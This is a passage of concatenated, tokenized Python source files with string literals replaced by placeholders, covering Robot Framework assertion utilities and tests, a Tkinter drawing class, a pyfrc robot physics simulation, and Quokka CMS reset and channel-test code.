_report_inequality_failure ( first , second , msg , values , '<STR_LIT>' ) <EOL> def assert_not_equal ( first , second , msg = None , values = True ) : <EOL> """<STR_LIT>""" <EOL> if first == second : <EOL> _report_inequality_failure ( first , second , msg , values , '<STR_LIT>' ) <EOL> def assert_almost_equal ( first , second , places = <NUM_LIT:7> , msg = None , values = True ) : <EOL> """<STR_LIT>""" <EOL> if round ( second - first , places ) != <NUM_LIT:0> : <EOL> extra = '<STR_LIT>' % places <EOL> _report_inequality_failure ( first , second , msg , values , '<STR_LIT>' , extra ) <EOL> def assert_not_almost_equal ( first , second , places = <NUM_LIT:7> , msg = None , values = True ) : <EOL> """<STR_LIT>""" <EOL> if round ( second - first , places ) == <NUM_LIT:0> : <EOL> extra = '<STR_LIT>' % places <EOL> _report_inequality_failure ( first , second , msg , values , '<STR_LIT>' , extra ) <EOL> def _report_failure ( msg ) : <EOL> if msg is None : <EOL> raise AssertionError ( ) <EOL> raise AssertionError ( msg ) <EOL> def _report_inequality_failure ( obj1 , obj2 , msg , values , delim , extra = None ) : <EOL> if not msg : <EOL> msg = _get_default_message ( obj1 , obj2 , delim ) <EOL> elif values : <EOL> msg = '<STR_LIT>' % ( msg , _get_default_message ( obj1 , obj2 , delim ) ) <EOL> if values and extra : <EOL> msg += '<STR_LIT:U+0020>' + extra <EOL> raise AssertionError ( msg ) <EOL> def _get_default_message ( obj1 , obj2 , delim ) : <EOL> str1 = unic ( obj1 ) <EOL> str2 = unic ( obj2 ) <EOL> if delim == '<STR_LIT>' and str1 == str2 : <EOL> return '<STR_LIT>' % ( str1 , type_name ( obj1 ) , <EOL> str2 , type_name ( obj2 ) ) <EOL> return '<STR_LIT>' % ( str1 , delim , str2 ) </s>
<s> import os . path <EOL> import re <EOL> from . charwidth import get_char_width <EOL> from . misc import seq2str2 <EOL> from . unic import unic <EOL> _MAX_ASSIGN_LENGTH = <NUM_LIT:200> <EOL> _MAX_ERROR_LINES = <NUM_LIT> <EOL> _MAX_ERROR_LINE_LENGTH = <NUM_LIT> <EOL> _ERROR_CUT_EXPLN = '<STR_LIT>' <EOL> _TAGS_RE = re . compile ( r'<STR_LIT>' , re . IGNORECASE ) <EOL> def cut_long_message ( msg ) : <EOL> lines = msg . splitlines ( ) <EOL> lengths = _count_line_lengths ( lines ) <EOL> if sum ( lengths ) <= _MAX_ERROR_LINES : <EOL> return msg <EOL> start = _prune_excess_lines ( lines , lengths ) <EOL> end = _prune_excess_lines ( lines , lengths , from_end = True ) <EOL> return '<STR_LIT:\n>' . join ( start + [ _ERROR_CUT_EXPLN ] + end ) <EOL> def _prune_excess_lines ( lines , lengths , from_end = False ) : <EOL> if from_end : <EOL> lines . reverse ( ) <EOL> lengths . reverse ( ) <EOL> ret = [ ] <EOL> total = <NUM_LIT:0> <EOL> limit = _MAX_ERROR_LINES // <NUM_LIT:2> <EOL> for line , length in zip ( lines [ : limit ] , lengths [ : limit ] ) : <EOL> if total + length >= limit : <EOL> ret . append ( _cut_long_line ( line , total , from_end ) ) <EOL> break <EOL> total += length <EOL> ret . append ( line ) <EOL> if from_end : <EOL> ret . reverse ( ) <EOL> return ret <EOL> def _cut_long_line ( line , used , from_end ) : <EOL> available_lines = _MAX_ERROR_LINES // <NUM_LIT:2> - used <EOL> available_chars = available_lines * _MAX_ERROR_LINE_LENGTH - <NUM_LIT:3> <EOL> if len ( line ) > available_chars : <EOL> if not from_end : <EOL> line = line [ : available_chars ] + '<STR_LIT>' <EOL> else : <EOL> line = '<STR_LIT>' + line [ - available_chars : ] <EOL> return line <EOL> def _count_line_lengths ( lines ) : <EOL> return [ _count_virtual_line_length ( line ) for line in lines ] <EOL> def _count_virtual_line_length ( line ) : <EOL> if not line : <EOL> return <NUM_LIT:1> <EOL> lines , remainder = divmod ( len ( line ) , _MAX_ERROR_LINE_LENGTH ) <EOL> return lines if not remainder else lines + <NUM_LIT:1> <EOL> def format_assign_message ( variable , value , cut_long = True ) : <EOL> formatter = { '<STR_LIT:$>' : unic , '<STR_LIT:@>' : seq2str2 , '<STR_LIT:&>' : _dict_to_str } [ variable [ <NUM_LIT:0> ] ] <EOL> value = formatter ( value ) <EOL> if cut_long and len ( value ) > _MAX_ASSIGN_LENGTH : <EOL> value = value [ : _MAX_ASSIGN_LENGTH ] + '<STR_LIT>' <EOL> return '<STR_LIT>' % ( variable , value ) <EOL> def _dict_to_str ( d ) : <EOL> if not d : <EOL> return '<STR_LIT>' <EOL> return '<STR_LIT>' % '<STR_LIT>' . join ( '<STR_LIT>' % ( unic ( k ) , unic ( v ) ) <EOL> for k , v in d . items ( ) ) <EOL> def get_console_length ( text ) : <EOL> return sum ( get_char_width ( char ) for char in text ) <EOL> def pad_console_length ( text , width ) : <EOL> if width < <NUM_LIT:5> : <EOL> width = <NUM_LIT:5> <EOL> diff = get_console_length ( text ) - width <EOL> if diff > <NUM_LIT:0> : <EOL> text = _lose_width ( text , diff + <NUM_LIT:3> ) + '<STR_LIT>' <EOL> return _pad_width ( text , width ) <EOL> def _pad_width ( text , width ) : <EOL> more = width - get_console_length ( text ) <EOL> return text + '<STR_LIT:U+0020>' * more <EOL> def _lose_width ( text , diff ) : <EOL> lost = <NUM_LIT:0> <EOL> while lost < diff : <EOL> lost += get_console_length ( text [ - <NUM_LIT:1> ] ) <EOL> text = text [ : - <NUM_LIT:1> ] <EOL> return text <EOL> def split_args_from_name_or_path ( name ) : <EOL> if os . path . exists ( name ) : <EOL> return os . path . abspath ( name ) , [ ] <EOL> index = _get_arg_separator_index_from_name_or_path ( name ) <EOL> if index == - <NUM_LIT:1> : <EOL> return name , [ ] <EOL> args = name [ index + <NUM_LIT:1> : ] . split ( name [ index ] ) <EOL> name = name [ : index ] <EOL> if os . path . exists ( name ) : <EOL> name = os . path . abspath ( name ) <EOL> return name , args <EOL> def _get_arg_separator_index_from_name_or_path ( name ) : <EOL> colon_index = name . find ( '<STR_LIT::>' ) <EOL> if colon_index == <NUM_LIT:1> and name [ <NUM_LIT:2> : <NUM_LIT:3> ] in ( '<STR_LIT:/>' , '<STR_LIT:\\>' ) : <EOL> colon_index = name . find ( '<STR_LIT::>' , colon_index + <NUM_LIT:1> ) <EOL> semicolon_index = name . find ( '<STR_LIT:;>' ) <EOL> if colon_index == - <NUM_LIT:1> : <EOL> return semicolon_index <EOL> if semicolon_index == - <NUM_LIT:1> : <EOL> return colon_index <EOL> return min ( colon_index , semicolon_index ) <EOL> def split_tags_from_doc ( doc ) : <EOL> doc = doc . rstrip ( ) <EOL> tags = [ ] <EOL> if not doc : <EOL> return doc , tags <EOL> lines = doc . splitlines ( ) <EOL> match = _TAGS_RE . match ( lines [ - <NUM_LIT:1> ] ) <EOL> if match : <EOL> doc = '<STR_LIT:\n>' . join ( lines [ : - <NUM_LIT:1> ] ) . rstrip ( ) <EOL> tags = [ tag . strip ( ) for tag in match . group ( <NUM_LIT:1> ) . split ( '<STR_LIT:U+002C>' ) ] <EOL> return doc , tags </s>
<s> import unittest <EOL> from robot . utils . asserts import assert_equal <EOL> from robot . model import TestSuite <EOL> from robot . model . filter import Filter <EOL> class FilterBaseTest ( unittest . TestCase ) : <EOL> def _create_suite ( self ) : <EOL> self . s1 = TestSuite ( name = '<STR_LIT>' ) <EOL> self . s21 = self . s1 . suites . create ( name = '<STR_LIT>' ) <EOL> self . s31 = self . s21 . suites . create ( name = '<STR_LIT>' ) <EOL> self . s31 . tests . create ( name = '<STR_LIT>' , tags = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . s31 . tests . create ( name = '<STR_LIT>' , tags = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . s31 . tests . create ( name = '<STR_LIT>' ) <EOL> self . s22 = self . s1 . suites . create ( name = '<STR_LIT>' ) <EOL> self . s22 . tests . create ( name = '<STR_LIT>' , tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:X>' ] ) <EOL> def _test ( self , filter , s31_tests , s22_tests ) : <EOL> self . _create_suite ( ) <EOL> self . s1 . visit ( filter ) <EOL> assert_equal ( [ t . name for t in self . s31 . tests ] , s31_tests ) <EOL> assert_equal ( [ t . name for t in self . s22 . tests ] , s22_tests ) <EOL> assert_equal ( self . s1 . test_count , len ( s31_tests + s22_tests ) ) <EOL> class TestFilterByIncludeTags ( FilterBaseTest ) : <EOL> def test_no_filtering ( self ) : <EOL> self . _test ( Filter ( ) , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> self . _test ( Filter ( include_tags = [ ] ) , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> def test_no_match ( self ) : <EOL> self . _test ( Filter ( include_tags = [ '<STR_LIT>' , '<STR_LIT>' ] ) , [ ] , [ ] ) <EOL> def test_constant ( self ) : <EOL> self . _test ( Filter ( include_tags = [ '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> def test_string ( self ) : <EOL> self . _test ( Filter ( include_tags = '<STR_LIT>' ) , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> def test_pattern ( self ) : <EOL> self . _test ( Filter ( include_tags = [ '<STR_LIT>' ] ) , [ '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> self . _test ( Filter ( include_tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> def test_normalization ( self ) : <EOL> self . _test ( Filter ( include_tags = [ '<STR_LIT>' , '<STR_LIT>' ] ) , [ '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> def test_and_and_not ( self ) : <EOL> self . _test ( Filter ( include_tags = [ '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , [ ] ) <EOL> self . _test ( Filter ( include_tags = [ '<STR_LIT>' ] ) , [ ] , [ '<STR_LIT>' ] ) <EOL> self . _test ( Filter ( include_tags = [ '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , [ ] ) <EOL> self . _test ( Filter ( include_tags = [ '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , [ ] ) <EOL> class TestFilterByExcludeTags ( FilterBaseTest ) : <EOL> def test_no_filtering ( self ) : <EOL> self . _test ( Filter ( ) , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> self . _test ( Filter ( exclude_tags = [ ] ) , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> def test_no_match ( self ) : <EOL> self . _test ( Filter ( exclude_tags = [ '<STR_LIT>' , '<STR_LIT>' ] ) , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> def test_constant ( self ) : <EOL> self . _test ( Filter ( exclude_tags = [ '<STR_LIT>' ] ) , [ '<STR_LIT>' , '<STR_LIT>' ] , [ ] ) <EOL> def test_string ( self ) : <EOL> self . _test ( Filter ( exclude_tags = '<STR_LIT>' ) , [ '<STR_LIT>' , '<STR_LIT>' ] , [ ] ) <EOL> def test_pattern ( self ) : <EOL> self . _test ( Filter ( exclude_tags = [ '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , [ ] ) <EOL> self . _test ( Filter ( exclude_tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> def test_normalization ( self ) : <EOL> self . _test ( Filter ( exclude_tags = [ '<STR_LIT>' , '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , [ ] ) <EOL> def test_and_and_not ( self ) : <EOL> self . _test ( Filter ( exclude_tags = [ '<STR_LIT>' ] ) , [ '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> self . _test ( Filter ( exclude_tags = [ '<STR_LIT>' ] ) , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , [ ] ) <EOL> self . _test ( Filter ( exclude_tags = [ '<STR_LIT>' ] ) , [ '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> self . _test ( Filter ( exclude_tags = [ '<STR_LIT>' ] ) , [ '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> class TestFilterByTestName ( FilterBaseTest ) : <EOL> def test_no_filtering ( self ) : <EOL> self . _test ( Filter ( ) , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> self . _test ( Filter ( include_tests = [ ] ) , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> def test_no_match ( self ) : <EOL> self . _test ( Filter ( include_tests = [ '<STR_LIT>' ] ) , [ ] , [ ] ) <EOL> def test_constant ( self ) : <EOL> self . _test ( Filter ( include_tests = [ '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> self . _test ( Filter ( include_tests = [ '<STR_LIT>' , '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , [ ] ) <EOL> def test_string ( self ) : <EOL> self . _test ( Filter ( include_tests = '<STR_LIT>' ) , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> def test_pattern ( self ) : <EOL> self . _test ( Filter ( include_tests = [ '<STR_LIT>' ] ) , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> self . _test ( Filter ( include_tests = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , [ '<STR_LIT>' , '<STR_LIT>' ] , [ ] ) <EOL> def test_longname ( self ) : <EOL> self . _test ( Filter ( include_tests = [ '<STR_LIT>' , '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> def test_normalization ( self ) : <EOL> self . _test ( Filter ( include_tests = [ '<STR_LIT>' , '<STR_LIT>' ] ) , [ '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> class TestFilterBySuiteName ( FilterBaseTest ) : <EOL> def test_no_filtering ( self ) : <EOL> self . _test ( Filter ( ) , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> self . _test ( Filter ( include_suites = [ ] ) , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> def test_no_match ( self ) : <EOL> self . _test ( Filter ( include_suites = [ '<STR_LIT>' ] ) , [ ] , [ ] ) <EOL> def test_constant ( self ) : <EOL> self . _test ( Filter ( include_suites = [ '<STR_LIT>' ] ) , [ ] , [ '<STR_LIT>' ] ) <EOL> self . _test ( Filter ( include_suites = [ '<STR_LIT>' , '<STR_LIT>' ] ) , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' ] ) <EOL> def test_string ( self ) : <EOL> self . _test ( Filter ( include_suites = '<STR_LIT>' ) , [ ] , [ '<STR_LIT>' ] ) <EOL> def test_pattern ( self ) : <EOL> self . _test ( Filter ( include_suites = [ '<STR_LIT>' ] ) , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , [ ] ) <EOL> def test_reuse_filter ( self ) : <EOL> filter = Filter ( include_suites = [ '<STR_LIT>' ] ) <EOL> self . _test ( filter , [ ] , [ '<STR_LIT>' ] ) <EOL> self . _test ( filter , [ ] , [ '<STR_LIT>' ] ) <EOL> def test_parent_name ( self ) : <EOL> self . _test ( Filter ( include_suites = [ '<STR_LIT>' ] ) , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , [ ] ) <EOL> self . _test ( Filter ( include_suites = [ '<STR_LIT>' ] ) , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , [ ] ) <EOL> self . _test ( Filter ( include_suites = [ '<STR_LIT>' ] ) , [ ] , [ '<STR_LIT>' ] ) <EOL> self . _test ( Filter ( include_suites = [ '<STR_LIT>' ] ) , [ ] , [ ] ) <EOL> def test_normalization ( self ) : <EOL> self . _test ( Filter ( include_suites = [ '<STR_LIT>' , '<STR_LIT>' ] ) , [ ] , [ '<STR_LIT>' ] ) <EOL> def test_with_other_filters ( self ) : <EOL> self . _test ( Filter ( include_suites = [ '<STR_LIT>' ] , include_tests = [ '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , [ ] ) <EOL> self . _test ( Filter ( include_suites = [ '<STR_LIT>' ] , include_tags = [ '<STR_LIT>' ] ) , [ ] , [ '<STR_LIT>' ] ) <EOL> self . _test ( Filter ( include_suites = [ '<STR_LIT>' , '<STR_LIT>' ] , exclude_tags = [ '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , [ ] ) <EOL> class TestRemoveEmptySuitesDuringFilter ( FilterBaseTest ) : <EOL> def test_remove_empty_leaf_suite ( self ) : <EOL> self . _test ( Filter ( include_tags = '<STR_LIT>' ) , [ '<STR_LIT>' ] , [ ] ) <EOL> assert_equal ( list ( self . s1 . suites ) , [ self . s21 ] ) <EOL> def test_remove_branch ( self ) : <EOL> self . _test ( Filter ( include_suites = '<STR_LIT>' ) , [ ] , [ '<STR_LIT>' ] ) <EOL> assert_equal ( list ( self . s1 . suites ) , [ self . s22 ] ) <EOL> def test_remove_all ( self ) : <EOL> self . _test ( Filter ( include_tests = '<STR_LIT:none>' ) , [ ] , [ ] ) <EOL> assert_equal ( list ( self . s1 . suites ) , [ ] ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import sys <EOL> class Listener : <EOL> ROBOT_LISTENER_API_VERSION = <NUM_LIT:2> <EOL> def __init__ ( self , name = '<STR_LIT:X>' ) : <EOL> self . name = name <EOL> def start_suite ( self , name , attrs ) : <EOL> self . _log ( "<STR_LIT>" . format ( self . name ) ) <EOL> def close ( self ) : <EOL> self . _log ( "<STR_LIT>" ) <EOL> def report_file ( self , path ) : <EOL> self . _log ( "<STR_LIT>" . format ( path ) ) <EOL> def log_file ( self , path ) : <EOL> self . _log ( "<STR_LIT>" . format ( path ) ) <EOL> def output_file ( self , path ) : <EOL> self . _log ( "<STR_LIT>" . format ( path ) ) <EOL> def _log ( self , message ) : <EOL> sys . __stdout__ . write ( "<STR_LIT>" . format ( message ) ) </s>
<s> import unittest <EOL> import os <EOL> from robot . errors import DataError <EOL> from robot . tidy import TidyCommandLine <EOL> from robot . utils . asserts import assert_raises_with_msg , assert_equal , assert_true <EOL> class TestArgumentValidation ( unittest . TestCase ) : <EOL> def test_valid_explicit_format ( self ) : <EOL> opts , _ = self . _validate ( format = '<STR_LIT>' ) <EOL> assert_equal ( opts [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_valid_implicit_format ( self ) : <EOL> opts , _ = self . _validate ( args = [ __file__ , '<STR_LIT>' ] ) <EOL> assert_equal ( opts [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_no_format ( self ) : <EOL> opts , _ = self . _validate ( ) <EOL> assert_equal ( opts [ '<STR_LIT>' ] , None ) <EOL> def test_invalid_explicit_format ( self ) : <EOL> self . _validate ( format = '<STR_LIT>' , error = "<STR_LIT>" ) <EOL> def test_invalid_implicit_format ( self ) : <EOL> self . _validate ( args = [ __file__ , '<STR_LIT>' ] , error = "<STR_LIT>" ) <EOL> self . _validate ( args = [ __file__ , '<STR_LIT>' ] , error = "<STR_LIT>" ) <EOL> def test_no_space_count ( self ) : <EOL> opts , _ = self . _validate ( ) <EOL> assert_true ( '<STR_LIT>' not in opts ) <EOL> def test_valid_space_count ( self ) : <EOL> opts , _ = self . _validate ( spacecount = '<STR_LIT>' ) <EOL> assert_equal ( opts [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> def test_invalid_space_count ( self ) : <EOL> error = '<STR_LIT>' <EOL> self . _validate ( spacecount = '<STR_LIT>' , error = error ) <EOL> self . _validate ( spacecount = '<STR_LIT:1>' , error = error ) <EOL> def test_inplace_and_recursive_cannot_be_used_together ( self ) : <EOL> self . _validate ( inplace = True , recursive = True , <EOL> error = '<STR_LIT>' ) <EOL> def test_zero_argument_is_never_accepted ( self ) : <EOL> class Stubbed ( TidyCommandLine ) : <EOL> def _report_error ( self , message , ** args ) : <EOL> raise DataError ( message ) <EOL> for args in [ ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] : <EOL> assert_raises_with_msg ( DataError , '<STR_LIT>' , <EOL> Stubbed ( ) . execute_cli , args ) <EOL> def test_default_mode_accepts_one_or_two_arguments ( self ) : <EOL> self . _validate ( args = [ __file__ ] ) <EOL> self . _validate ( args = [ __file__ , '<STR_LIT>' ] ) <EOL> self . _validate ( args = [ __file__ , '<STR_LIT:2>' , '<STR_LIT:3>' ] , <EOL> error = '<STR_LIT>' ) <EOL> def test_recursive_accepts_only_one_argument ( self ) : <EOL> self . _validate ( recursive = True , args = [ '<STR_LIT:.>' , '<STR_LIT:..>' ] , <EOL> error = '<STR_LIT>' ) <EOL> def test_inplace_accepts_one_or_more_arguments ( self ) : <EOL> for count in range ( <NUM_LIT:1> , <NUM_LIT:10> ) : <EOL> self . _validate ( inplace = True , args = [ __file__ ] * count ) <EOL> def test_default_mode_requires_input_to_be_file ( self ) : <EOL> error = '<STR_LIT>' <EOL> self . _validate ( args = [ '<STR_LIT:.>' ] , error = error ) <EOL> self . _validate ( args = [ '<STR_LIT>' ] , error = error ) <EOL> def test_inplace_requires_inputs_to_be_files ( self ) : <EOL> error = '<STR_LIT>' <EOL> self . _validate ( inplace = True , args = [ __file__ , '<STR_LIT:.>' ] , error = error ) <EOL> self . _validate ( inplace = True , args = [ __file__ , '<STR_LIT>' ] , error = error ) <EOL> def test_recursive_requires_input_to_be_directory ( self ) : <EOL> self . _validate ( recursive = True , <EOL> error = '<STR_LIT>' ) <EOL> def test_line_separator ( self ) : <EOL> for input , expected in [ ( None , os . linesep ) , ( '<STR_LIT>' , os . linesep ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:\r\n>' ) , ( '<STR_LIT>' , '<STR_LIT:\n>' ) ] : <EOL> opts , _ = self . _validate ( lineseparator = input ) <EOL> assert_equal ( opts [ '<STR_LIT>' ] , expected ) <EOL> def test_invalid_line_separator ( self ) : <EOL> self . _validate ( lineseparator = '<STR_LIT>' , <EOL> error = "<STR_LIT>" ) <EOL> def _validate ( self , inplace = False , recursive = False , format = None , <EOL> spacecount = None , lineseparator = None , args = [ __file__ ] , <EOL> error = None ) : <EOL> opts = { '<STR_LIT>' : inplace , '<STR_LIT>' : recursive , '<STR_LIT>' : format , <EOL> '<STR_LIT>' : spacecount , '<STR_LIT>' : lineseparator } <EOL> validate = lambda : TidyCommandLine ( ) . validate ( opts , args ) <EOL> if error : <EOL> assert_raises_with_msg ( DataError , error , validate ) <EOL> else : <EOL> return validate ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import math <EOL> class DrawableElement ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , pts , center , angle , color ) : <EOL> self . color = color <EOL> self . pts = pts <EOL> self . center = center <EOL> self . angle = angle <EOL> def initialize ( self , canvas ) : <EOL> self . canvas = canvas <EOL> self . id = self . canvas . create_polygon ( * self . pts , fill = self . color ) <EOL> def intersects ( self ) : <EOL> pass <EOL> def move ( self , v ) : <EOL> '''<STR_LIT>''' <EOL> vx , vy = v <EOL> vx , vy = vx * math . cos ( self . angle ) - vy * math . sin ( self . angle ) , vx * math . sin ( self . angle ) + vy * math . cos ( self . angle ) <EOL> def _move ( xy ) : <EOL> x , y = xy <EOL> return x + vx , y + vy <EOL> self . pts = [ p for p in map ( lambda x : _move ( x ) , self . pts ) ] <EOL> self . center = _move ( self . center ) <EOL> def rotate ( self , angle ) : <EOL> '''<STR_LIT>''' <EOL> self . angle = ( self . angle + angle ) % ( math . pi * <NUM_LIT> ) <EOL> c = math . cos ( angle ) <EOL> s = math . sin ( angle ) <EOL> px , py = self . center <EOL> def _rotate_point ( xy ) : <EOL> x , y = xy <EOL> x = x - px <EOL> y = y - py <EOL> return ( x * c - y * s ) + px , ( x * s + y * c ) + py <EOL> self . pts = [ p for p in map ( lambda x : _rotate_point ( x ) , self . pts ) ] <EOL> def set_color ( self , color ) : <EOL> self . color = color <EOL> self . canvas . itemconfig ( self . id , fill = color ) <EOL> def update_coordinates ( self ) : <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> pts = [ c for p in self . pts for c in p ] <EOL> self . canvas . coords ( self . id , * pts ) <EOL> def perform_move ( self ) : <EOL> self . update_coordinates ( ) <EOL> class CompositeElement ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self ) : <EOL> self . elements = [ ] <EOL> def initialize ( self , canvas ) : <EOL> for e in self . elements : <EOL> e . initialize ( canvas ) <EOL> def move ( self , v ) : <EOL> for e in self . elements : <EOL> e . move ( v ) <EOL> def rotate ( self , angle ) : <EOL> for e in self . elements : <EOL> e . rotate ( angle ) <EOL> def update_coordinates ( self ) : <EOL> for e in self . elements : <EOL> e . update_coordinates ( ) <EOL> class TextElement ( DrawableElement ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , text , center , angle , color , fontSize ) : <EOL> super ( ) . __init__ ( [ center ] , center , angle , color ) <EOL> self . text = text <EOL> self . fontSize = fontSize <EOL> def initialize ( self , canvas ) : <EOL> self . canvas = canvas <EOL> x , y = self . center <EOL> self . id = self . canvas . create_text ( y , x , text = self . text , <EOL> font = ( "<STR_LIT>" , self . fontSize , "<STR_LIT>" ) ) <EOL> self . set_color ( self . color ) <EOL> def perform_move ( self ) : <EOL> pass </s>
<s> from pyfrc . physics import drivetrains <EOL> class PhysicsEngine ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , physics_controller ) : <EOL> '''<STR_LIT>''' <EOL> self . physics_controller = physics_controller <EOL> self . position = <NUM_LIT:0> <EOL> self . physics_controller . add_analog_gyro_channel ( <NUM_LIT:1> ) <EOL> def update_sim ( self , hal_data , now , tm_diff ) : <EOL> '''<STR_LIT>''' <EOL> l_motor = hal_data [ '<STR_LIT>' ] [ <NUM_LIT:1> ] [ '<STR_LIT:value>' ] <EOL> r_motor = hal_data [ '<STR_LIT>' ] [ <NUM_LIT:2> ] [ '<STR_LIT:value>' ] <EOL> speed , rotation = drivetrains . two_motor_drivetrain ( l_motor , r_motor ) <EOL> self . physics_controller . drive ( speed , rotation , tm_diff ) <EOL> self . position += hal_data [ '<STR_LIT>' ] [ <NUM_LIT:4> ] [ '<STR_LIT:value>' ] * tm_diff * <NUM_LIT:3> <EOL> if self . position <= <NUM_LIT:0> : <EOL> switch1 = True <EOL> switch2 = False <EOL> elif self . position > <NUM_LIT:10> : <EOL> switch1 = False <EOL> switch2 = True <EOL> else : <EOL> switch1 = False <EOL> switch2 = False <EOL> hal_data [ '<STR_LIT>' ] [ <NUM_LIT:1> ] [ '<STR_LIT:value>' ] = switch1 <EOL> hal_data [ '<STR_LIT>' ] [ <NUM_LIT:2> ] [ '<STR_LIT:value>' ] = switch2 <EOL> hal_data [ '<STR_LIT>' ] [ <NUM_LIT:2> ] [ '<STR_LIT>' ] = self . position </s>
<s> """<STR_LIT>""" <EOL> from quokka import create_app <EOL> from quokka . core . models . content import Content <EOL> from quokka . core . models . config import Config <EOL> from quokka . core . models . channel import Channel <EOL> from quokka . modules . accounts . models import User <EOL> app = create_app ( ) <EOL> Content . objects . delete ( ) <EOL> User . objects . delete ( ) <EOL> Config . objects . delete ( ) <EOL> for channel in Channel . objects . filter ( parent__ne = None ) : <EOL> channel . delete ( ) <EOL> Channel . objects . delete ( ) </s>
<s> import sys <EOL> from . import BaseTestCase <EOL> from quokka . core . models . channel import Channel <EOL> from quokka . core . models . config import Config <EOL> from quokka . core . models . custom_values import CustomValue <EOL> if sys . version_info . major == <NUM_LIT:3> : <EOL> unicode = lambda x : u'<STR_LIT:{}>' . format ( x ) <EOL> class TestChannel ( BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> self . parent , new = Channel . objects . get_or_create ( <EOL> title = u'<STR_LIT>' , <EOL> ) <EOL> self . channel , new = Channel . objects . get_or_create ( <EOL> title = u'<STR_LIT>' , <EOL> description = u'<STR_LIT>' , <EOL> parent = self . parent , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> ) <EOL> def tearDown ( self ) : <EOL> self . channel . delete ( ) <EOL> self . parent . delete ( ) <EOL> def test_channel_fields ( self ) : <EOL> self . assertEqual ( self . channel . title , u'<STR_LIT>' ) <EOL> self . assertEqual ( self . channel . slug , u'<STR_LIT>' ) <EOL> self . assertEqual ( self . channel . long_slug , u'<STR_LIT>' ) <EOL> self . assertEqual ( self . channel . mpath , u'<STR_LIT>' ) <EOL> self . assertEqual ( self . channel . description , <EOL> u'<STR_LIT>' ) <EOL> self . assertEqual ( self . channel . tags , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . channel . parent , self . parent ) <EOL> self . assertEqual ( unicode ( self . channel ) , u'<STR_LIT>' ) <EOL> def test_get_ancestors ( self ) : <EOL> self . assertEqual ( list ( self . channel . get_ancestors ( ) ) , [ self . channel , <EOL> self . parent ] ) <EOL> def test_get_ancestors_slug ( self ) : <EOL> self . assertEqual ( self . channel . get_ancestors_slugs ( ) , <EOL> [ u'<STR_LIT>' , u'<STR_LIT>' ] ) <EOL> def test_get_children ( self ) : <EOL> self . assertEqual ( list ( self . parent . get_children ( ) ) , [ self 